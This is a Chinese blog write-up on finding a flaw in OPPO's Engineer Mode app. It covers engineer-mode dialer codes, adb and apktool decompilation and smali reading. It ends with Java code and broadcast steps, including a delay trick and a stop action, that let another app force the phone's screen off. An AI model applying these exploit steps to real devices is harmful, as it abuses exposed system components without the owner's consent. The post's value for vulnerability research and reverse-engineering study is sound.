OPPO找漏洞的思路总结

漏洞的主要切入点 “工程模式” 找到工程模式apk
OPPO:#36446337#。
华为:
##121314##*

adb shell
cd /system/app/OppoEngineerMode/
//退出 shell
exit

//控制台 导出APK文件
adb pull /system/app/OppoEngineerMode/OppoEngineerMode.apk
//apktool 查看 manifest.xml
apktool d OppoEngineerMode.apk

注:apktool 不只可以查看manifest.xml,还可以看smali源码,使用sublime text2高亮查看,教程地址:https://www.jianshu.com/p/5fb93a270ad0

在 manifest.xml中可以找到关键代码


            
                
                
            
        

查看此类源码用到两个工具,dex2jar-2.1与jd-gui-osx-1.4.0;要注意的是 dex2jar版本不能过低,目前发现2.0不可用。
先解压OppoEngineerMode.apk

unzip OppoEngineerMode.apk所在路径 -d 解压到的文件夹路径
//取出classes.dex文件 使用dex2jar-2.1工具得到classes-dex2jar.jar
sh d2j-dex2jar.sh classes.dex -f

这样就可以使用jd-gui-osx-1.4.0查看JAR代码,找到manifest.xml中对应的类路径


OPPO找漏洞的思路总结_第1张图片
image.png

读完代码找到关键代码 :goToSleep。想办法执行到此代码进行反推

首先 paramInt1 == 7 而这个参数源于showColow方法。而这个方法在class文件中却找不到调用处,不过 有一点有些可疑-wrap0是什么?如下

private BroadcastReceiver mReceiver = new BroadcastReceiver()
...
    LcdColorTestActivity.-wrap0(LcdColorTestActivity.this, j, i);

除了看JAR代码,还有可以看smali代码,最终使用sublime text2代码(教程:https://www.jianshu.com/p/5fb93a270ad0]https://www.jianshu.com/p/5fb93a270ad0) 代码如下:

# direct methods
.method static synthetic -wrap0(Lcom/oppo/autotest/lcd/LcdColorTestActivity;II)V
    .locals 0
    .param p0, "-this"    # Lcom/oppo/autotest/lcd/LcdColorTestActivity;
    .param p1, "type"    # I
    .param p2, "color"    # I

    .prologue
    invoke-direct {p0, p1, p2}, Lcom/oppo/autotest/lcd/LcdColorTestActivity;->showColow(II)V

    return-void
.end method

这也是门语言,具体不在这里记述,可看如下学习:https://segmentfault.com/a/1190000011746970
至少通过以上samli代码知道wrap0与color和type有关,回到class文件中,也只有color_type关键字可以尝试,最终得到 action:com.oppo.autotest.lcdcolortest 并且 color_type = 7时 净会被执行goToSleep方法。

继续反推,因为这个ACTION属于页面级注册,需要先启动此activity才能接收到action,所以 代码又需要产生几行 如下

        String pkg = "com.oppo.engineermode";
        String claz = "com.oppo.autotest.lcd.LcdColorTestActivity";
        try {
            Intent intent = new Intent();
            ComponentName cp = new ComponentName(pkg, claz);
            intent.setComponent(cp);
            intent.setAction(Intent.ACTION_VIEW);
            startActivity(intent);
        } catch (Exception ex) {
            ex.printStackTrace();
        }

执行上面两行代码后 发现并无效果,屏幕只是黑了,但并未真正锁屏,通知栏还能下拉,背光灯还亮着,回过头来再想,是因为代码分析的不对吗?

非也,是因为注册是异步的,执行注册后立即执行发送广播未必能收得到 所以这里尝试注册后加延时600ms 再发送广播。成功了。

......

然而 解锁后 竟然会自动又锁屏,再一细看 并非锁屏,而是黑色未真正锁屏的状态,与执行startactivity的情景一样,回来再看class代码,发现竟然有 关闭activity的ACTION

      if ("com.oppo.autotest.lcdcolortest.stop".equals(paramAnonymousContext)) {
        LcdColorTestActivity.this.finish();
      }

试着发送此广播,在 “com.oppo.autotest.lcdcolortest” 之后 ,这次连贯了。就此完成




总结:找漏洞是个慢工,细活,发现一点点可疑要多思考,多尝试,不能怕麻烦,也不要因为多次尝次给自己绕蒙了,时刻撑握好思路线。

你可能感兴趣的:(OPPO找漏洞的思路总结)